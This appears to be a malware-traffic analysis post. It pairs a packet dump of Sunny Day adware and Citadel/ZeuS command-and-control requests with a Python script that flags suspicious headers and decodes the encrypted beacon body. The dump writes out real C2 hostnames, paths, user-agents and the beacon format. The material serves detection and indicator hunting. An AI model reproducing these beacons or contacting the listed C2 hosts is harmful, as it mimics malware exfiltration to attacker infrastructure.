Netstream.exe Loads Sunny Day and Citadel/ZeuS Malware PCAP file download

2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 564053523
x-spidermessenger-length: 280
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 386
Cache-Control: no-cache

ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D

2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, length 235
[235-byte TLS ClientHello; SNI: upd.adskyforever.com]
2016-08-25 20:40:58.906135 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [P.], seq 0:341, ack 1, win 64240, length 341: HTTP: POST /file.php HTTP/1.1
POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

[130-byte binary POST body; not printable]
2016-08-25 20:40:58.920785 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [.], ack 1603268971, win 64240, length 0
2016-08-25 20:40:58.921202 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [P.], seq 0:353, ack 1, win 64240, length 353: HTTP: POST /file.php HTTP/1.1
POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

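The requests above, run through a small triage script. This is an added example and not part of the original post or the PCAP: the request texts are transcribed from the dump (headers verbatim, the Sunny Day body verbatim; the two binary bodies sent to qawsf1gy.bget.ru are not printable in the dump and are left empty), and the flagging rules (non-browser User-Agent, custom x- headers, wildcard Content-Type, POST without Referer, Content-Length mismatch) are the editor's own heuristics rather than any vendor's signatures. The x-spidermessenger-* check URL-decodes and base64-decodes the beacon body and compares the result with what the headers declare.

```python
"""Header-level triage of the HTTP requests in this capture.

Added example, not part of the original post. The request texts are transcribed
from the tcpdump output above (headers verbatim, Sunny Day body verbatim); the
binary bodies of the two POSTs to qawsf1gy.bget.ru are not printable in the
dump and are left empty. The flagging rules are the editor's own heuristics.
"""
import base64
import zlib
from urllib.parse import unquote

SUNNYDAY_POST = "\r\n".join([
    "POST /cgi-bin/get_protect.cgi HTTP/1.1",
    "x-spidermessenger-crypted: 2",
    "x-spidermessenger-crc32: 564053523",
    "x-spidermessenger-length: 280",
    "Content-Type: text/*",
    "User-Agent: sun21-SunnyDay21",
    "Host: prof.youandmeandmeandyouhihi.com",
    "Content-Length: 386",
    "Cache-Control: no-cache",
    "",
    "ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D",
])
ADTAG_GET = "\r\n".join([
    "GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1",
    "Content-Type: application/x-www-form-urlencoded",
    "Accept: */*",
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
    "Host: ads.regiedepub.com",
    "Connection: Keep-Alive",
    "", "",
])

def citadel_post(content_length):
    """The two POSTs to qawsf1gy.bget.ru differ only in Content-Length (130, 142)."""
    return "\r\n".join([
        "POST /file.php HTTP/1.1", "Accept: */*",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
        "Host: qawsf1gy.bget.ru", f"Content-Length: {content_length}",
        "Connection: Keep-Alive", "Cache-Control: no-cache", "", "",
    ])

CAPTURED_REQUESTS = [SUNNYDAY_POST, ADTAG_GET, citadel_post(130), citadel_post(142)]

def parse_request(raw):
    """Split one HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers, "body": body}

def decode_spidermessenger(req):
    """Decode the URL-encoded base64 beacon body and compare it with the x-spidermessenger-*
    headers. The CRC32 here is over the decoded (still encrypted) blob; the capture does not
    say whether the header's CRC covers that blob or the plaintext."""
    h = req["headers"]
    b64 = unquote(req["body"])                  # %2F -> /, %2B -> +, %3D -> =
    blob = base64.b64decode(b64, validate=True)
    crc = zlib.crc32(blob) & 0xFFFFFFFF
    declared_crc = int(h["x-spidermessenger-crc32"])
    return {"content_length_ok": len(req["body"]) == int(h["content-length"]),
            "base64_chars": len(b64), "decoded_bytes": len(blob),
            "declared_length": int(h["x-spidermessenger-length"]),
            "declared_crc32": declared_crc, "crc32_of_blob": crc,
            "crc32_matches_blob": crc == declared_crc}

def triage(raw):
    """Pull the IOC fields out of one request and apply the heuristics."""
    req = parse_request(raw)
    h = req["headers"]
    ua = h.get("user-agent", "")
    flags = []
    # Not Mozilla/-prefixed, or naming the WinHTTP COM object: a script or implant, not a browser.
    if not ua.startswith("Mozilla/") or "winhttprequest" in ua.lower():
        flags.append("non-browser user-agent")
    custom = [n for n in h if n.startswith("x-")]
    if custom:
        flags.append("custom x- headers: " + ", ".join(custom))
    if h.get("content-type", "").endswith("/*"):
        flags.append("wildcard content-type")  # a media-type range belongs in Accept, not Content-Type
    if req["method"] == "POST" and "referer" not in h:
        flags.append("POST with no Referer")
    declared = int(h.get("content-length", "0"))
    if len(req["body"]) != declared:
        flags.append(f"body length {len(req['body'])} != Content-Length {declared}")
    if "x-spidermessenger-length" in h and req["body"]:
        info = decode_spidermessenger(req)
        if info["decoded_bytes"] != info["declared_length"]:
            flags.append(f"x-spidermessenger-length {info['declared_length']} "
                         f"!= decoded blob {info['decoded_bytes']} bytes")
    return {"method": req["method"], "host": h.get("host"), "path": req["path"],
            "user_agent": ua, "flags": flags}

if __name__ == "__main__":
    for r in [triage(x) for x in CAPTURED_REQUESTS]:
        print(f"{r['method']} {r['host']}{r['path']}\n   UA: {r['user_agent']}")
        for f in r["flags"]:
            print("   -", f)
```

Running it shows the decoded beacon body is 272 bytes while x-spidermessenger-length declares 280, so that header does not describe the body as sent; whether it is the plaintext length before encryption, and whether x-spidermessenger-crc32 covers the plaintext or the ciphertext, cannot be settled from the capture alone. The hostnames, URIs and User-Agent strings the script prints are the indicators to pivot on.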